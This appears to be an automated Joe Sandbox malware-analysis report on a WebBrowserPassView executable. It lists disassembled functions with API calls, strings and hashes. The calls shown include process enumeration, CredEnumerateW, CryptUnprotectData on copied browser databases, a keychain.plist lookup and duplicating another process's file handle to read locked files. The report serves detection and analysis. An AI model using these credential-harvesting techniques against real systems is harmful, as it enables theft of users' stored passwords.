API String ID: 594330280-3398334509
Opcode ID: 41abfebd1c81519318b0f84339465481cac2966d8304d7996ed66729d33f3768
Instruction ID: 29761171d8d6f99e34678da7c42ad3d9b616dea413bdd79b79df07308111e2da
Opcode Fuzzy Hash: 41abfebd1c81519318b0f84339465481cac2966d8304d7996ed66729d33f3768
Instruction Fuzzy Hash: E2815971900209EFDB10EF95CC85AAEBBB5FF44305F20447AE905B7291D739AE80CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00415799 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142
processlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00408D81: free.MSVCRT(00000000,004124C5,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00408D88

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004157B7
memset.MSVCRT ref: 004157CC
Process32FirstW.KERNEL32(00000000,?), ref: 004157E8
OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 0041582D
memset.MSVCRT ref: 00415854
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00415889
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 004158A3
CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 004158F5
free.MSVCRT(?), ref: 0041590E
Process32NextW.KERNEL32(00000000,0000022C), ref: 00415957
CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00415967

Strings

QueryFullProcessImageNameW, xrefs: 00415893
kernel32.dll, xrefs: 00415884

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
String ID: QueryFullProcessImageNameW$kernel32.dll
API String ID: 1344430650-1740548384
Opcode ID: 6e73d59367b69d0d0be5dcf68efd57544415f5f941da5b83940bd7f87101e519
Instruction ID: 5ea73396ca473a1f837e0a83f3483b5d1fff5a6958d458d66b17e1ba5df2901d
Opcode Fuzzy Hash: 6e73d59367b69d0d0be5dcf68efd57544415f5f941da5b83940bd7f87101e519
Instruction Fuzzy Hash: 4B5179B2800218EBDB10EF55CC84ADEB7B9AF95304F1141ABE518E3251D7755E84CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00406F91 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,004552B0,?,?,004116CB,?,General,?,00000000,00000001), ref: 00406FA9
FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 00406FBA
LoadResource.KERNEL32(00000000,00000000), ref: 00406FC8
SizeofResource.KERNEL32(?,00000000), ref: 00406FD8
LockResource.KERNEL32(00000000), ref: 00406FE1
memcpy.MSVCRT ref: 00407011

Strings

BIN, xrefs: 00406FAF

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
String ID: BIN
API String ID: 1668488027-1015027815
Opcode ID: 0cc70d90eb5fe2022f84bb375c7f586452e31cf1ff3c5ba81afc9f946eb2bfa1
Instruction ID: d4af116c543dc71c648d7e8b177643e8ae674b9e270c37636f22300aa75b878c
Opcode Fuzzy Hash: 0cc70d90eb5fe2022f84bb375c7f586452e31cf1ff3c5ba81afc9f946eb2bfa1
Instruction Fuzzy Hash: 5F11C635C00225EBC7116BE2DC49DAFBE78FF85765F020836F811B2291DB385D158AA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6AF Relevance: 4.6, APIs: 3, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 0041A5D7: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 0041A603
Part of subcall function 0041A5D7: malloc.MSVCRT ref: 0041A60E
Part of subcall function 0041A5D7: free.MSVCRT(?), ref: 0041A61E

Part of subcall function 004192F2: GetVersionExW.KERNEL32(?), ref: 00419315

GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 0041A729
GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 0041A751
free.MSVCRT(00000000,?,00000000,?,00000000), ref: 0041A75A

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
String ID:
API String ID: 1355100292-0
Opcode ID: 2fc49b45259d659c88a61f00e55ea1ae81ff3f089ebddaf00de521a8b5a49264
Instruction ID: 68c13852fb7afd5d8e0c76ce401d57be7323acd7ffb7733afae93f72ee07f9cd
Opcode Fuzzy Hash: 2fc49b45259d659c88a61f00e55ea1ae81ff3f089ebddaf00de521a8b5a49264
Instruction Fuzzy Hash: F1216576802218AEEB12ABA4CD44DEF77BCEF05304F1404A7E551D7181E6788FD587A6

Uniqueness

Uniqueness Score: -1.00%

Function 00407687 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(-000000FB,00000000,-000000FB,00000000,00000000,-000000FB,-000000FB), ref: 004076FC

Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA

GetProcAddress.KERNEL32(0045EC00,00000000), ref: 004076B7
FreeLibrary.KERNEL32(00000000,00000141,?,-000000FB,?,004016C4,?,00000000,00000000,?), ref: 004076DA

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
String ID:
API String ID: 767404330-0
Opcode ID: 832906d8a5cb12c8bb733d11a894d9ba26b44f5734ad55cd07f5800a04fa7da7
Instruction ID: d423364176a6c8dd7e4ff5da1a82baf2de462266435030bf45fa2c9e15a2548a
Opcode Fuzzy Hash: 832906d8a5cb12c8bb733d11a894d9ba26b44f5734ad55cd07f5800a04fa7da7
Instruction Fuzzy Hash: 6C018471504A01DED6215F55CC4581BFAE9EB90750B208C3FF0D6E21A0D775AC40DB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040B477 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,?,?,00000000,00414A22,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040B48D
FindNextFileW.KERNELBASE(?,?,?,00000000,00414A22,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040B4A9

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: 25427dac3f5a35f7db7d55267f62273ad0c88017264c5fb9230d8676d76f7256
Instruction ID: 0f501c6d627a291db363f91b892f93565970ce46203e449eca58727f5cb945cd
Opcode Fuzzy Hash: 25427dac3f5a35f7db7d55267f62273ad0c88017264c5fb9230d8676d76f7256
Instruction Fuzzy Hash: F9F06276501A119BC721DB74DC459D773D8DB85320B25063EF56AE33C1EF3CAA098768

Uniqueness

Uniqueness Score: -1.00%

Function 0041A8D8 Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041A8E3
GetSystemInfo.KERNELBASE(004735C0,?,00000000,004453C0,?,?,?,?,?,?,?,?), ref: 0041A8EC

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: InfoSystemmemset
String ID:
API String ID: 3558857096-0
Opcode ID: a69cf0a51d705e93120e938875cfc719a6a5558cfc76ca9bbae332f7c4943f52
Instruction ID: 008e5f0b5c38a1f1cab39b63f665e63cad528b58ea392fd89bbd5874da5d37fe
Opcode Fuzzy Hash: a69cf0a51d705e93120e938875cfc719a6a5558cfc76ca9bbae332f7c4943f52
Instruction Fuzzy Hash: 95E09271A066206BE3117B726C06BDF26D4AF42349F05043BFD0996243E72C8A85829E

Uniqueness

Uniqueness Score: -1.00%

Function 00413F68 Relevance: 48.1, APIs: 25, Strings: 2, Instructions: 802
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00413FEF
wcsrchr.MSVCRT ref: 00414007
memset.MSVCRT ref: 0041413A
memset.MSVCRT ref: 00414152

Part of subcall function 0040CC16: _wcslwr.MSVCRT ref: 0040CCC5
Part of subcall function 0040CC16: wcslen.MSVCRT ref: 0040CCDA

Part of subcall function 0040B8EC: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040B925
Part of subcall function 0040B8EC: wcslen.MSVCRT ref: 0040B942
Part of subcall function 0040B8EC: wcsncmp.MSVCRT(?,?,?,00000214,?,00000000,?), ref: 0040B974
Part of subcall function 0040B8EC: memset.MSVCRT ref: 0040B9CD
Part of subcall function 0040B8EC: memcpy.MSVCRT ref: 0040B9EE

Part of subcall function 0041607F: GetProcAddress.KERNEL32(?,00000000), ref: 004160B2

memset.MSVCRT ref: 0041416A
memset.MSVCRT ref: 00414182
memset.MSVCRT ref: 004142F8
memset.MSVCRT ref: 00414310
memset.MSVCRT ref: 0041439B
memset.MSVCRT ref: 00414448
memset.MSVCRT ref: 00414460
memset.MSVCRT ref: 004144DA
_wcsicmp.MSVCRT ref: 00414820

Part of subcall function 004010A6: CopyFileW.KERNEL32(?,?,00000000,?,?), ref: 004011E4
Part of subcall function 004010A6: memset.MSVCRT ref: 00401208
Part of subcall function 004010A6: DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401499

memset.MSVCRT ref: 00414590

Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE

memset.MSVCRT ref: 0041461C
memset.MSVCRT ref: 00414634
memset.MSVCRT ref: 0041464C
memset.MSVCRT ref: 00414765
memset.MSVCRT ref: 0041477D
memset.MSVCRT ref: 004144F2

Part of subcall function 004010A6: memset.MSVCRT ref: 004010D3
Part of subcall function 004010A6: wcsrchr.MSVCRT ref: 004010EF
Part of subcall function 004010A6: memset.MSVCRT ref: 0040110D
Part of subcall function 004010A6: memset.MSVCRT ref: 004011AC
Part of subcall function 004010A6: CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 004011C3

Part of subcall function 0040B3FA: wcscmp.MSVCRT ref: 0040B419
Part of subcall function 0040B3FA: wcscmp.MSVCRT ref: 0040B42A

memset.MSVCRT ref: 004143B3

Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314

Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B

Strings

*.*, xrefs: 0041499A
Apple Computer\Preferences\keychain.plist, xrefs: 0041479A

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$Filewcslen$wcscmpwcsrchr$AddressAttributesCopyCreateCredDeleteEnumerateFolderPathProcSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
String ID: *.*$Apple Computer\Preferences\keychain.plist
API String ID: 241508006-3798722523
Opcode ID: 4897106e075bc5921eaf289f9d098f3c492b25a96b4848b4f8fb3fa18f6e3c29
Instruction ID: 160b922070d72b691ae3132d21ec35459ff4d79c06758521881ebd4265f3e304
Opcode Fuzzy Hash: 4897106e075bc5921eaf289f9d098f3c492b25a96b4848b4f8fb3fa18f6e3c29
Instruction Fuzzy Hash: 785276B2900219ABDB10EB51CD46EDFB77CAF45344F0501BBF508A6192EB385E948B9E

Uniqueness

Uniqueness Score: -1.00%

Function 004122BA Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004053E1: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405400
Part of subcall function 004053E1: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00405412
Part of subcall function 004053E1: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405426
Part of subcall function 004053E1: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00405451

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 004122E6
GetModuleHandleW.KERNEL32(00000000,00416ACC,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 004122FF
EnumResourceTypesW.KERNEL32 ref: 00412306

Strings

/savelangfile, xrefs: 00412352
, xrefs: 0041231A
/deleteregkey, xrefs: 00412380

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
String ID: $/deleteregkey$/savelangfile
API String ID: 2744995895-28296030
Opcode ID: a23a53bd30f639ab6e593c7dcdfa98b0c8a8014cf9dc6c45a60d320dd2194cd3
Instruction ID: 2178966f4a80c8fc13f983811a773bf45d976ad6511b0e23f4840dc4cb99dd1b
Opcode Fuzzy Hash: a23a53bd30f639ab6e593c7dcdfa98b0c8a8014cf9dc6c45a60d320dd2194cd3
Instruction Fuzzy Hash: 01519D71508345ABC720AFA2CD4899F77A8FF85348F40083EFA45E2151DB79D8558B6A

Uniqueness

Uniqueness Score: -1.00%

Function 004010A6 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 387
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004010D3

Part of subcall function 0040A22F: wcscpy.MSVCRT ref: 0040A234
Part of subcall function 0040A22F: wcsrchr.MSVCRT ref: 0040A23C

wcsrchr.MSVCRT ref: 004010EF
memset.MSVCRT ref: 0040110D
memset.MSVCRT ref: 004011AC
CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 004011C3
CopyFileW.KERNEL32(?,?,00000000,?,?), ref: 004011E4
FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 004011EF
memset.MSVCRT ref: 00401208
memset.MSVCRT ref: 0040127E
memcmp.MSVCRT ref: 00401373

Part of subcall function 00407687: GetProcAddress.KERNEL32(0045EC00,00000000), ref: 004076B7
Part of subcall function 00407687: FreeLibrary.KERNEL32(00000000,00000141,?,-000000FB,?,004016C4,?,00000000,00000000,?), ref: 004076DA
Part of subcall function 00407687: CryptUnprotectData.CRYPT32(-000000FB,00000000,-000000FB,00000000,00000000,-000000FB,-000000FB), ref: 004076FC

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401499
memset.MSVCRT ref: 00401507
memcpy.MSVCRT ref: 0040151A
LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00401541

Strings

v10, xrefs: 0040136B
chp, xrefs: 004011CE

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
String ID: chp$v10
API String ID: 580435826-2783969131
Opcode ID: b514bb59bfc53d624b8cafe0ce1b0ddb728e252bcecfd9585c573925251d1e23
Instruction ID: f518f8cdbbaa5cc0a15761cad5a7de08cb03170c242fb237df98171784d43b0b
Opcode Fuzzy Hash: b514bb59bfc53d624b8cafe0ce1b0ddb728e252bcecfd9585c573925251d1e23
Instruction Fuzzy Hash: 26D18472D00218AFEB10EB95DC81EEE77B8AF04314F1144BAF515F7292DA785F848B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C009 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004083CC: _wcsicmp.MSVCRT ref: 004083FD

Part of subcall function 004086CB: memset.MSVCRT ref: 004087C7

free.MSVCRT(00000000), ref: 0040C1F8

Part of subcall function 0040BAAE: _wcsicmp.MSVCRT ref: 0040BAC7

memset.MSVCRT ref: 0040C0DE

Part of subcall function 0040B04F: wcslen.MSVCRT ref: 0040B062
Part of subcall function 0040B04F: memcpy.MSVCRT ref: 0040B081

wcschr.MSVCRT ref: 0040C116
memcpy.MSVCRT ref: 0040C14A
memcpy.MSVCRT ref: 0040C165
memcpy.MSVCRT ref: 0040C180
memcpy.MSVCRT ref: 0040C19B

Strings

ModifiedTime, xrefs: 0040C0AE
ExpiryTime, xrefs: 0040C094
AccessCount, xrefs: 0040C07A
CreationTime, xrefs: 0040C087
EntryID, xrefs: 0040C0C8
AccessedTime, xrefs: 0040C0A1
Url, xrefs: 0040C0BB
, xrefs: 0040C03B

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
API String ID: 3849927982-2252543386
Opcode ID: 76d4ef1edd0dd59ac6c56e1808c3e4ae1bc2ed7639c56b04a999e4706e5744af
Instruction ID: 832bc5c0d001ab4c3975677652535c3cfd3fcf8644338d95e37f76bfb8271b51
Opcode Fuzzy Hash: 76d4ef1edd0dd59ac6c56e1808c3e4ae1bc2ed7639c56b04a999e4706e5744af
Instruction Fuzzy Hash: D2514071E003099BDB10DFA5DD86ADEB7B8AF40704F15453BA504BB2D2EB7899058F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD7C Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040BAE3: memset.MSVCRT ref: 0040BB0B
Part of subcall function 0040BAE3: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040BB32
Part of subcall function 0040BAE3: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040BB73
Part of subcall function 0040BAE3: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040BB9C
Part of subcall function 0040BAE3: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040BBA7
Part of subcall function 0040BAE3: _wcsicmp.MSVCRT ref: 0040BC10

Part of subcall function 0040B5F5: ??2@YAPAXI@Z.MSVCRT ref: 0040B5FE

OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040BDF1
GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040BE10
DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040BE1D
GetFileSize.KERNEL32(?,00000000), ref: 0040BE32

Part of subcall function 0040A004: GetTempPathW.KERNEL32(00000104,?,?), ref: 0040A01B
Part of subcall function 0040A004: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040A02D
Part of subcall function 0040A004: GetTempFileNameW.KERNELBASE(?,004011DE,00000000,?), ref: 0040A044

Part of subcall function 00409C9B: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,00410072,00000000,?,004122A5,00000000,00000000,?,00000000,00000000), ref: 00409CAD

CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040BE5C
MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040BE71
WriteFile.KERNELBASE(00000000,00000000,00000104,0040C401,00000000), ref: 0040BE8C
UnmapViewOfFile.KERNEL32(00000000), ref: 0040BE93
FindCloseChangeNotification.KERNELBASE(?), ref: 0040BE9C
CloseHandle.KERNEL32(00000000), ref: 0040BEA1
CloseHandle.KERNEL32(?), ref: 0040BEA6
CloseHandle.KERNEL32(?), ref: 0040BEAB

Strings

bhv, xrefs: 0040BE3B

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
String ID: bhv
API String ID: 327780389-2689659898
Opcode ID: 131e7068980ec65edbb2b84da51a09623bafa4f0fcb63a4d56c059ca8b9c60f2
Instruction ID: 81637e7f8efa5e62e8569a4f404239e6b0c8c80861be29ec9ae91375cb438629
Opcode Fuzzy Hash: 131e7068980ec65edbb2b84da51a09623bafa4f0fcb63a4d56c059ca8b9c60f2
Instruction Fuzzy Hash: 26411676900218FBCF119FA1CC499DFBFB9EF09750F108026FA04A6251D7749A44DBE9

Uniqueness

Uniqueness Score: -1.00%

Function 0041599C Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA

GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 004159BC
